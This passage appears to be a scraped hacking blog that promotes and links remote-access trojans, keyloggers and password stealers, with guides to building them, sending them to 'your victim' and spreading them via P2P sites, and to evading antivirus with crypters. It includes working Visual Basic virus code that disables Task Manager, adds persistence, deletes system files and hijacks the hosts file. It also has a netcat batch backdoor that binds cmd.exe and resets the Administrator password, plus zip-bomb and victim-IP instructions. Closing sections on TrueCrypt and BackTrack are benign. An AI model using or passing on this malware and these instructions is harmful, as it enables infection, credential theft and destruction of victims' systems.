* Control web browser (Change homepage, open site etc.)
* Get system information (OS Version, AV name, Ram Memory, Computer name etc.)
* Get passwords, credit card numbers or private data etc.
* View and remote control desktop
* Record camera & sound
* Control mouse
* Delete, rename, download, upload or move files
Are RATs Illegal?
Some RATs are legal, and some are not. Legal are the one without backdoor left, and they have ability to close connection anytime. Illegal are used for hacking and they can steal data (Credit Cards, Passwords, private data etc.).
Here is a list of some Legal and Illegal RATs:
Legal:
* TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
* UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
* Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
* Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.
Illegal:
* Spy-Net
* Cerberus Rat
* CyberGate Rat
* SubSeven
* Turkojan
* ProRat
Darkcomet

How do I use these RATs?
For the legal RATs, for example, TeamViewer, give the other party your ID and password (the one who is getting viewed gives the other the information). The other connection then puts the ID. You then have many options to choose from, which are self explanatory (once connected).
For the illegal Rats, you need to portforward it to listen onto a port. You then need to build a server, spread it to others, they run your program, and they’re infected.

How do I port forward?
Port forwarding is easy and important for an illegal RAT. You need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter (write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.

How do I control server?
Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.
Where and how do I spread?
There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites (uTorrent, Pirate bay etc.), YouTube, etc. Some people use custom made Auto-Spreaders programs to spread their server.

What’s reverse Connection?
A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.

Whats Direct Connection?
A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.
FAQs (Frequently Asked Questions) about RATs

Q – Why my RAT server is detected by the most anti-virus software?
A – If you want to make your server FUD (Fully UnDetectable), you will need crypter. Also, you can hex edit your server, but be careful some servers can crash after hex editing.

Q – Can I get infected by using a RAT?
A – If the programmer that gives a download link to the RAT backdoors it (very possible), then yes. By simply downloading a file, you can be infected and vulnerable to many things. By using a legal rat, chances are you won’t be infected.

Q – How do I remove server if I infect myself?
A – When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. There is another way, download MalwareBytes’ Anti-Malware and scan whole computer for trojans.

Q – Can I get traced when I rat somebody?
A – Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.

JPS VIRUS MAKER 3.0

You can make different types of viruses with the help of JPS…

JPS Virusmaker

Thursday 17 November 2011

HACK COMPUTER USING CYBERGATE RAT

What is CyberGate:

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continously getting developed by our experienced team.

What it can do:

CyberGate was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this though it’s abundant array of features. A few of which are illustrated below:

[+] Automatically map ports if your router supports uPnP;

[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.

[+] Reverse Connection : Some of the listed advantages of a reverse connection –
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote’s computer is connecting to the remote administrator, one does not need to know the remote’s IP address in order to connect.

# It is much easier to keep track of the computers the RAT is installed on, since they are all “calling home” by connecting to the remote administrator.

[+] User Friendly GUI : The neat and simple GUI of CyberGate make this tool very easy to use and the simplest way to achieve yours goals.

[+] Stealth : The various features of the server installation makes the server extremely customizable accord to each user’s needs and requirements.

[+] Keylogger : This tool can be used to find out what is happening on your computer while you are away, maintain a backup of your typed data.

[+] Password recovery : It can be used to recover some of passwords that your forgot long time ago.

[+] Tasks: CyberGate is able to create either tasks for the Client to perform on a specific time after being started or an individual remote whenever it connects back to CyberGate.

[+] Connections tab: You can monitor all the connections and client performance from a connection log that will register actions and time /date for those actions.

Download CyberGate

SPYNET 2.7 RAT – GHOST EDITION

New features included:
- Added optional connection limit.
- Increased connection stability. Spy-Net is now as stable as SS-Rat.
- Increased speed in filemanager list files and list drives.
- Autostart on most features now.
- Password retrieval has been improved.

Features and Specs:
- server around 280 kb, depending on if icon is selected, rootkit, upx compressed, etc
- windows xp, vista and 7 compatible;
- DNS Updater (for now working with No-IP. developing dyndns updater atm)
- File Manger with a load full of options like FTP upload, set attributes to files, preview for images, etc etc etc;
- Windows List;
- Process List;
- Device List;
- Service List;
- Registry Editor;
- Installed Programs;
- Active Ports List;
- Remote Desktop;
- Webcam capture;
- Audio Capture;
- Password Recovery Tool (with direct download to client or FTP logs);
- Password Grabber;
- Socks 4/5 proxy;
- HTTP Proxy;
- Open Webpage;
- Download and Execute;
- Send local files and run hidden or normally;
- Remote Chat Client;
- DOS Prompt;
- Run cmd;
- Clipboard Grabber;
- Search for remote files and search on Password Recovery Tool;
- Access to download folder, remote desktop screen shots and web capture from menu.
- Encrypted traffic between Client and server;
- a few extra options (restart, lock buttons and stuff….) and all the options related to server (uninstall, rename, etc etc etc);
- add a new option for injection – wait for first browser to open. not the default but the first to start. seems useful in some cases.
- Rootkit in beta stage and being developed. It will hide process name and startup keys that have SPY_NET_RAT as name. Tested under XP and working, being developed and tested on other OS’s;
- Connections Limit selector;
- Binder,
- Columns selector (u can choose which columns u wanna see details from in the client. ex: u can hide RAM info view or Ports info view or any other using right click on top of the columns);
- Ability to choose either server is installed or not in remote computer.

NOTICE:you cant update it spynet 2.6 to 2.7 its not compatible…
Download SpyNet

FUD KEYLOGGER WITH FUD CRYPTERS TO HACK ACCOUNTS

Features of This Keylogger/Stealer:

- Keylogger

-Password Stealer (Opera,firefox,IE)
-USB virus Spreader
-Icon Changer
-File binder
-Taskmanager Kill
-Cookie Löscher
-Downloader
-Website Blocker
-Autostart with Windows
-Fake Error
-Antis
-Assembly changer/Dropper
-Neue Icons
-Neue Stealer Regs
-Build- bug wird gefixt
-Stub-Bug wird gefixt
-FUD
-Cure
-Firewall disabler
-System Restore point deaktiviert
-CMD deaktivert
-Bat.REG Files Deaktivert
-File Pumper
-Opera+chrome stealer
-Application stealer
-Windoof Serial Stealer
-PC Info stealer

Download Now – Click Here and Get It

DARKCOMET RAT V3.0 – HACK ANY COMPUTER

DarkComet 3.0 List improvement:
By DarkCoderSc

- 09/10/2010 : RC4 traffic encryption done , its encrypt all plain text and data flux with a RC4 encryption 256 bit , all your private data are now totally secured and DarkComet is impossible to flood / exploit .
- 09/10/2010 : Dynamic RC4 256 bit Key added when you choose a password on DarkComet , thats mean if you want to be secured at 200% when you choose a password in server it will bind the actual RC4 key with your password then without the correct client password the data wont be correctly decrypted then nothing will work without your password.
- 09/10/2010 : Now edit server settings are totally encrypted in RC4 256 bit too then its no more possible to reverse and read your personnal settings , again you are totally secured now
- 10/10/2010 : New column added in connection list (SIN) , now you can see the RAM usage/Total RAM and Free RAM.
- 10/10/2010 : New column added in connection list (SIN) , now you can see the country code/country localisation(geo) and the default system langage
- 10/10/2010 : New column added in connection list (SIN) , now you can see the first execution data/time of the server if it just been executed and not installed it display the current date/time.
- 10/10/2010 : Now you can choose if you want to display the default language flag or the geo ip flag
- 10/10/2010 : In OS collumn windows installed drive added (its where windows was installed)
- 12/10/2010 : Clipboard manager have been recoded , now you can resize the textbox and listview for a better confort
- 12/10/2010 : Two functions added in Clipboard manager , get the remote clipboard text in your clipboard , and send your clipboard text to the remote clipboard.
- 12/10/2010 : Process Manager got now a real better compatibility on 64 bit OS, now it list all process
- 12/10/2010 : Process Manager list the process 3x faster.
- 12/10/2010 : If you use a password for protecting connection it will be display in tray icons with a locker to remind you !
- 16/10/2010 : New toast style made , now you it display more information and have a better design.
- 16/10/2010 : Clipboard copy problem fixed in password manager , also the whole system is more stable

Download

HOW TO HIDE A VIRUS INTO ANOTHER FILE

There are many ways one can get a virus but in this case he had picked up some bad files on Limewire (P2P file sharing software). The viruses were wrapped up with legitimate music files. In other words, he downloaded the music file, ran the music file and the music file played as usual. What he didn’t know is that a virus file was hidden within the music file. How does that happen? We will attempt to explain this.
Please note that we are not publishing the code we used to do this so others don’t download and abuse it!
First off we need a binder program…

This program will bind two files together. Now we are going to wrap up our virus file (File1) with our image file (File2). Notice how you can change the file extensions to what ever you want. You can load .exe, .vbs viruses etc… You can also choose that the main file is an image, video or what ever you want.

Once you have decided on what virus you want to hide and in what type of media file you want to use, you tell the code to run the media file normally but HIDE the virus file (usually runs in console window).

Once we have set up the C code to do as we want, we then run the makefile script. This will run our code through Borlands C compiler and build our program. The finished program is called dropper.exe. You can make this code have whatever icon you want. In this example, since we are trying to hide our virus in an image file we used an image icon.

Keep in mind that this is just one example of how people hide virus files inside other working media files. It is very important to have up to date AV (Anti Virus) software and if you are running a Windows computer ALWAYS have the computer show you the files extension!

KEY 1.0 KEYLOGGERS

Report date: 2011-01-29 14:30:18 (GMT 1)
File name: getthekey-1-0-exe
File size: 53760 bytes
MD5 Hash: fec89753fc76c4b3ac38e78fbfe49a5e
SHA1 Hash: bcff2a897c63922363d3c75ccce9887608dea909
Detection rate: 0 on 16 (0%)
Status: CLEAN

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org
File Info

Report date: 2011-01-29 14:29:56 (GMT 1)
File name: stub-exe
File size: 82432 bytes
MD5 Hash: 98b5fd46ebb60f1ebef3ed1bced1f5f8
SHA1 Hash: 722a4d599c277b33154e125dde40d50277b24a01
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/ATRAPS.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org

DOWNLOAD

EMISSARY KEYLOGGER – HACK ANY ACCOUNT

1st You need Download Emissary Keylogger
2nd Open and Extract the file into your hardrive you need winrar

Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from www.microsoft.com/net/. Else it won’t work…

3. Then Open Emissary Exe file dont open stub file.

Enter your Gmail ID and password…
Block AV Sites: Blocks VirusScanning Websites on victim’s computer
Add to Startup: Adds to Startup via Registry
Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
Disable TaskManager: Disable TaskManager on victim’s PC
Disable Regedit: Disable’s Regedit on victim’s PC

Check “Trojan Downloader” to Downloade and Execute a trojan on victim’s PC. You can also create a fake error message and scare your victim, like:

After all click on bild server the exe server file will create in the same directory send this file to your victim.
Thats it when he/she will run this file you will receive his/her password automatically in your gmail.

Download Emissary Keylogger

ISTEALER 3.0 – HACK ACCOUNT PASSWORDS

Step 1: 1st of all go to www.drivehq.com and Create a free ftp account and activate it.
Step 2: Download istealer 3.0

Step 3: Extract the download file into you hard drive with winrar Extension or any other compressing/Extracting tool.
Step 4: Open Isteler Exe File.

Step 5: 1st in Host box write ftp.drivehq.com
and in login box enter your user name that you create in drivehq.com i did say this in 1st step.

if you wanna bind it with any other software then you can bind if not otherwise blank leave this option.

Step 6: Click on Test Ftp. if open a box with this saying your ftp account work properly. see screenshot.

Step 7: Click on build…

Name the file and your file will be created automatically in the same directory.

Step 8: Send this file to your victim via email or any hosting site, when he/she will open this file. his/her password will upload in your ftp drivehq account.

HAZE STEALER – HACK EMAIL ACCOUNTS

This is a FREE FUD Stealer for all.This steals most of the important site like:

Firefox Stealer
Internet Explorer Stealer
Steam Stealer
Chrome Stealer
Filezilla Stealer
Game Keys
All Windows Keys
No-Ip Stealer

Scans:

File Info

Report date: 2010-10-06 18:41:48 (GMT 1)
File name: haze-stealer-exe
File size: 1782784 bytes
MD5 Hash: 0db9387a3e3261e89cf9eb0129fd749f
SHA1 Hash: 909fc67babf127226cd4ed084a4d6191eb5761b4
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared –
Avast –
AVG –
Avira AntiVir – SPR/PSW.Messen.FY
BitDefender –
ClamAV –
Comodo –
Dr.Web –
F-PROT6 –
Ikarus T3 –
Kaspersky –
NOD32 –
Panda –
TrendMicro –
VBA32 – Trojan-Spy.IEPV
VirusBuster –

Scan report generated by
NoVirusThanks.org

Download

KEYLOGGER STAR TOOLS – HACK ANY EMAIL

Step 1: First You should download star tools key logger Click Here for Download

Step 2: Extract rar file and run star tools: after hit will open a bok then go to tools and click on keylogger…

Step 3: Enter Your gmail id and password and hit build keylogger,

After enter email and pass click on build keylogger, after click a server.exe file created automatic in the same directory.
Step 4: Send this server file send to your victom. when he/she will run this file his all keystrokes will send in your gmail account automatic…

100+ HACKING TOOLS

Hacking Tools in This pack:-

HOTMAIL HACKING
YAHOO HACKING
MSN FUN TOOLS
FAKE SCREENS/PAGES
OTHER HACKING TOOLS

FUN TOOLS Page 1:
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head **** HotMail HAck
HotMail Hacker XE Edition
HotMail HAck
HotMAil Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail HAcker Final
Give me Ur Pass
HotMail Brute Forcer
MSN PAssword Finder
MSN Password Grabber
Hack MSN Password
Hack HotMAil Evolution
MAgic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMAil Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSNPage 2:
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login HotMail
B S Spy
Saria Fake LoginsPage 3:
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S H Yahoo Password SenderPage 4:
NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute ForcerPage 5:
Hook Tool Box
Smart HAck UpLoader
Remote Anything
Post Sage
PHPbb AttackerPage 6:
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus CleanerDownload and Enjoy hacking

Download 100 Hacking Tools

HACK ADMINISTRATOR PASSWORD IN WINDOWS XP, 7 & VISTA

If you did lost your password dont worry about this, just follow steps and login to ur admin.

You Need Blank Cd or floppy and internet Access Cd or floppy writer.

1. Download this small utility.

Click Here To Download

After download you will get zip and iso image file burn it with any burner into a floppy or cd.

Restart your system and when prompted press enter to boot from the CD.

Note: If you do not get prompt of boot from CD.Then restart you system and press f2 or f6 or f8 or Esc key(anyone of them should work for your system) before the booting of the windows start.Now you will enter into bios and you should change the boot order from here with the first preference as CD-ROM.And again restart your system

Now the software will load automatically.It will ask you to select the windows drive and after that provide you with the option of resetting password.

NOTEPAD HACKING TRICK

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.
1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes…!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

HOW TO CREATE A POWERFUL VIRUS IN VISUAL BASIC

Open VB and follow the code:

–code start here–

Private Sub Form_Load()
On Error Resume Next
‘This command will allow the application to continue running
‘even if an error occurs instead of terminating/closing.
Hide
‘This command will hide the application from even being seen on the victims
‘screen even if your program has it’s settings set to Visible|True
App.TaskVisible = False
‘This command is even better, this command will stop your program
‘from showing up in Task Manager-Applications Tab List, but it will still
‘show up in process list, sorry =/
End Sub

‘disable taskmanager

Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f”, vbHide
Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f”, vbHide
‘This command will make your application start with windows.
Shell “REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f”, vbHide
‘This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example
Shell “REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
‘These commands will set the time & date for the victims computer permanently
‘Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
‘for the date.
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “Drive:\Path\Name.exe”
‘This code well, it couldn’t be more obvious what it does, but when copying your virus/worm ect
‘to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
‘to get rid of your virus/worm/trojan ect.

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe” & intResult & “.exe”
‘Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
‘interval set to “1″ when this code runs, all user accounts desktops will be flooded with your virus and the longer it
‘runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
‘ C:\DOCU~\All Users\Start Menu\Programs\Start up\
‘That will cause the victim alot of hassle =P.

Kill “c:\windows\win.ini”
Kill “c:\windows\system.ini”
Open “c:\WINDOWS\win.ini” For Output As #1
Print #1, “Load = C:\Program Files\Virus1.exe”
Print #1, “run = C:\Program Files\Virus2.exe”
Close #1
Open “c:\WINDOWS\system.ini” For Output As #1
Print #1, “Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe”
Print #1, “Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe”
Close #1
‘Ok people more fun, making your application start with windows, without using Registry or DOS
‘one little alter and your viruses and start with windows and the victim will not know how.

Open “c:\WINDOWS\system32\drivers\etc\hosts” For Output As #1
Print #1, “208.65.153.251 208.65.153.251 “
Print #1, “208.65.153.251 www.google.com”
Print #1, “208.65.153.251 www.google.co.uk”
Print #1, “208.65.153.251 www.yahoo.com”
Print #1, “208.65.153.251 www.yahoo.co.uk”
Print #1, “208.65.153.251 www.askjeeves.com”
Print #1, “208.65.153.251 www.altavista.com”
Print #1, “208.65.153.251 www.alltheweb.com”
Print #1, “208.65.153.251 www.msn.com”
Print #1, “208.65.153.251 www.hotmail.com”
Print #1, “208.65.153.251 www.myspace.com”
Print #1, “208.65.153.251 www.plunder.com”
Print #1, “208.65.153.251 www.quicksharing.com”
Print #1, “208.65.153.251 www.myspace.co.uk”
Close #1
‘Just something to help stop the victim from google-ing what the virus has done, and getting information
‘or downloads to help rid them of your infection >=P.

Kill “%SystemRoot%\syst” & “em32\dfrg.msc”
Kill “%SystemRoot%\syste” & “m32\wscui.cpl”
Kill “C:\Program Files\Co” & “mmon Files\Microsoft Shared\MSInfo\msinfo32.exe”
Kill “%SystemRoot%\syste” & “m32\restore\rstrui.exe”
Kill “c:\WINDOWS\syste” & “m32\rundll32.exe”
‘Ok now finally let’s get rid of System Restore, Rundll(by deleting this file, the victim can no longer
‘view the properties window for any file on his or her computer).

–code end here–

REMOTE ANY COMPUTER BY EMAIL

http://www.runtime.org/remotebymail.htm

GET SOMEONE’S IP ADDRESS – 3 BEST METHODS

Obtaining an IP from MSN Messenger.

Firstly we learn the method used by most people when they want to get someone elses IP Address.

Step 1 – Start MSN Messenger and login as yourself.

Step 2 – Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks)

Step 3 – Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 4 – Start a conversation with your ‘victim’ and send them a file. Once they accept the file Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks) and Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 5 – Look in the middle column of both your MS Dos boxes and look in the newer wndow for the IP address that has magically appeared in the middle column. This is your victim’s IP Address.

Obtaining an IP from an E-Mail.

Ok, lets say the person does not use MSN Messenger (can’t blame them) we can get an IP address from most E-Mail address. In this example we shall use Outlook Express to view the E-Mails in.

Step 1 – Load Outlok express and left click on an E-Mail that was sent from your ‘victim’

Step 2 – Right click this E-Mail and click the “Properties” button.

Step 3 – Now Click on the tab displaying as it’s text “Details” and look for the buttom saying “Message Source”, once found (not hard) click it.

Step 4 – Look in all the jargon for something like “X-Originating-IP: “ with a number after the colon. This number is the sender’s IP Address.

Step 5 – If you cannot find “X-Originating-IP: ” then do not worry. Look for instead “Received:”, and go along this string untill you come to a nuber in brackets, this however maybe an IP but it might not be the IP address of the ‘victim’, infact if they sent the E-Mail from a we E-Mail service (like hotmail.com) then chances are it is not their IP address.
Obtaiing an IP from Physical Access.

If you have physical access to a computer then getting the IP address is simple.

Step 1 – Click the “Start” button and hit “Run”. Type in “Command” and hit enter.

Step 2 – Type in “ipconfig” OR “winipcfg” and hit enter now look for where it says “IP Address:”, next to this is the IP of the computer you are using…

ALL IN ONE HACKING SOFTWARE TOOL PACK

DOWNLOAD

PENTBOX SECURITY SUITE – V1.4

PenTBox is a Security Suite with programs like Password Crackers, Denial of Service testing tools like DoS and DDoS, Secure Password Generators, Honeypots and much more. Destined to test security and stability of networks.

Tools included in PenTBox

Base64 encoder y decoder,
Digest for MD5,
SHA1,
SHA256 and SHA512,
Port scanner,
TCP DoS,
TCP AutoDoS,
SYN DoS,
Honeypot,
L33t Sp3@k Converter

PenTBox is programmed in Ruby so ruby is required, and oriented to GNU/Linux systems compatible with Windows, MacOS and more.

Tutorial for PenTBox

1.Download PentBox and un tar
2. We are using windows box , simply run exe and choose from three options.
3. And your ready to attack or audit. Nothing much to think or relay on.
Download PentBox Here

Pentbox is simple yet powerful .Feature i liked most is simple honeypot…

HOW TO HACK A NETWORK COMPUTER

Now to do this you need a very innocent target! As we all know a Trojan is very liable to be picked up by AV what you need is Net cat, it opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file.

The batch file to copy net cat on the remote computer will have to be run from the target computer (The person on the target will have to implement the batch file in some way). Open Notepad and type this in:
Code
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd “Documents and Settings”
cd “All Users”
cd “Start Menu”
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

You save the file as a batch file using Notepad. The next batch file will be used to make sure the port you described opens up every time windows starts up and you can describe any port you wish. Open Notepad and type this:
Code
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Save the file as a batch file using Notepad this will be the file that is copied into the startup folder in the previous batch file we wrote. You can connect the batch file to another file and share that file, let the target implement that file so that he can copy net cat and the other batch file onto his/hers computer therefore opening port 9999 after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want! Example: try closing down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c “Hello”

Then the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel slightly on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

TRUECRYPT – FILE ENCRYPTION SOFTWARE

You can get the latest version of TrueCrypt (Which is version 7.0a) from here.

Once you download the .exe file and open it, you will be asked to agree with the lisence (which no one cares to read). on the next page of the wizard, you will be asked whether to install or extract. Let me explain, if you are planning on encryption a drive or your boot partition, or if you are planning on using TrueCrypt solely on your computer then choose the install option. If you are instead planning on using this tool on-the-go or on your flash drive then choose the extract option which will allow you to use this software anywhere and everywhere using the truecrypt.exe file.

Once the installation is done, do the following to make an encrypted virtual space for storing all your sensitive data:

1. After clicking the TrueCrypt icon, the main window should appear. Click the Create Volume button.

2. You will be taken to the Volume Creation Wizard. In this step you need to choose where you wish the truecrypt volume to be created. A truecrypt volume can reside in a file, which is also called container, in a partition or drive. In this tutorial we will choose the first option and create a TrueCrypt volume within a file. as the option is already selected, just click next.

3. In the next step, you will be asked whether to create a standard or hidden TrueCrypt volume. for more information on the hidden TrueCrypt volume, just select the ‘more info’ link on the wizard window. for now, lets just create a standard volume

4. Next step, you choose the location. note that it will be similar to any normal file (except for the fact that it can only be opened by TrueCrypt) so please remember that your truecrypt volume can be moved or deleted. You will also need to choose a file name for your volume after choosing the location.

Once the location is sorted, you will be asked to choose the size of your volume, the encryption scheme, a password and also the format of your volume. Choose the ones appropriate for you.

Once you click format, you are finally done! you will be greeted with a pop up windows that says that your volume has been created.

Now all you got to do is go back to the main TrueCrypt window, select any one of the provided drives, click on the select file button and select your volume and then hit Mount. You will be asked for your password, once you input that you can go to My Computer and find your TrueCrypt volume sitting there along side your C: and D: drive. you can just move all your sensitive files to your TrueCrypt volume and once done, select Unmount from the TrueCrypt main window.

BACKTRACK LINUX 5 RELEASED – DOWNLOAD

After being in production for almost 8 months, BackTrack has been updated! It has been aptly code named – “Revolution”.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.
Features:
KDE (4.6) and Gnome (2.6) Desktop environment flavours
32 and 64 bit support
A basic ARM BackTrack image which can be chrooted into from anfroid enabled devices.
The 32 and 64 bit images support “Forensics Mode”, which boots a forensically sound instance of BackTrack and ‘Stealth mode”. which boots without generating network traffic.

Download BackTrack5 from here: http://www.backtrack-linux.org/downloads/

DOWNLOAD BACKTRACK LINUX – BEST OPERATING SYSTEM FOR HACKERS

There are a couple of things that are essential to any hacker’s walk of life. To name a few, there’s the ubiquitous flash drive for data transfer. You have the crossover cable for even faster data transfer. There’s the Wi-Fi antenna for high gain and strong amplification. Possibly, you might find a video capture card in the computer. Of course, there’s the ubiquitous laptop and desktop computer. But what software is on these computers? Undoubtedly, you will find at least two operating systems, most often Windows and Linux. But with Linux, there are several different distributions. Is there a specific one? With hackers and crackers, there is only one Linux distro out there. It is called Backtrack.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking.

Regardless if you’re making BackTrack your primary operating system, booting from a Live DVD, or using your favourite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

Back Track is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hatters, it is an easy access to software that facilitates exploitations of secure system. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!

Major Features
BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will no enter monitor mode or inject packets without the MadWiFi driver patch. With BackTrack, you don’t need to worry about that. It’s just plug-and-play ready-to-go!

What’s great is that this Linux distribution comes Live-on-CD. So, no installation is needed. However, what you experience BackTrack, you will realize that it is a must to download this operating system and install it on your Laptop. At the very least, download the VMWare Virtual Appliance for Backtrack. Make sure you also install the VMWare Tools for Linux as well. Many features will still work in VMWare mode.

* Based on: Debian, Ubuntu
* Origin: Switzerland
* Architecture: i386
* Desktop: Fluxbox, KDE
* Category: Forensics, Rescue, Live Medium
* Cost: Free

Tools:
BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well known security tools including:

* Metasploit integration
* RFMON Injection capable wireless drivers
* Kismet
* Nmap
* Ettercap
* Wireshark (formerly known as Ethereal)
